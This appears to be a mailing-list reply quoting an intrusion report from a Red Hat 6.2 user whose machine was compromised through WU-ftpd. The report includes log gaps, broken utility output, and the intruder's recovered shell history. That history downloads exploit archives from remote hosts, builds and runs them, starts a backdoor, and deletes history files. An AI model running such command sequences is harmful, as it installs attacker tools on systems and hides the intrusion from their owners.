Dude, Seems you are running an insecure version of WU-ftpd please update it and remove any othe accounts created by the hacker. Regards lilo
--- mails@munshi.dyndns.org wrote: > Hello,
Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to this person who did it. Fortunely I have not lost a lot any important data. But first the proof that I have been hacked.
/var/log/messages
(This is the first line) Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp' Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp' Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
The part after 6:24 is proper, but my net wasnt working at that time (this is a normal thing and I do not susspect the hacker to do this, it is a normal thing and happens almost everyday, I get loggedout from my servers, the network is up but I cant access the internet also other from the outside world cant access my PC), so there are warning messages by my automatic IP updater from 6:24 onwards. What I am amazed is that after an entry at 2:22am there is an entry at 6:24, so someone has definately hacked and deleted the middle section, he probably left the upper part just to misguide us.
The .bas* were deleted, but unfortunately for the hacker the .bash_histrory has some important data there,
cd /dev/ida/.sys/trojan wget www.geocities.com/master0n/bestwu.tgz tar zxvf bestwu.tgz cd aw make ./awu 24.132 cd .. lsd ls rm -rf aw bestwu.tgz ls wget www.geocities.com/dont_haxer/b.tgz tar zxvf b.tgz rm -rf b.tgz cd .b ./bash ./bash cd /root rm -rf .bas*
After that is what I had been doing. So that is the last entry.
So my .bash_profile has been deleted and that is how I came to know that something i wrong, I have not rebooted my system as yet, and do not thing it is necessary. There are a few other things that amaze me here are
- First is the time 2:22am to 6:24am is free where
as there should have been entries from ddclient, a program that I am running. 2. The /dev/ida/.sys directory should exist since that is where the above commands have been run and there is no command that is deleting that directory in .bash_history. 3. netstat -a, ps ax are not working since the required libraries are not present, so I cant check which ports are open. The error given by netstat -a is
bash# netstat -a sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23 cat: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 cat: /root/.net: Too many open files in system
bash# ps ax sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23 egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23 cat: /root/.pstmp: Too many open files in system cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory cat: /root/.pstmp: No such file or directory
top is working fine but does not show me any problems
- wget was downloading mandrake for me, it should
have got disconnected since my net wasnt working, but it is still continuing to download the ISO's for me. Also another amazing thing is that wget was downloading 2nd ISO when I logged in and just downloaded 114MB of it and switchedover to 3rd ISO.
INFO Working on RH6.2, full installation. telnet was off, ssh is not there, ddclient may have opened a few ports that I may have not noticed, I just downloaded and installed ddclient just two days back, but it is a perl script, I have not yet gone through that script as yet.
Please help me to find the person who did this. Thanks in advance.
Bye.
________________________________________________________________________ Missed your favourite TV serial last night? Try the new, Yahoo! TV. visit http://in.tv.yahoo.com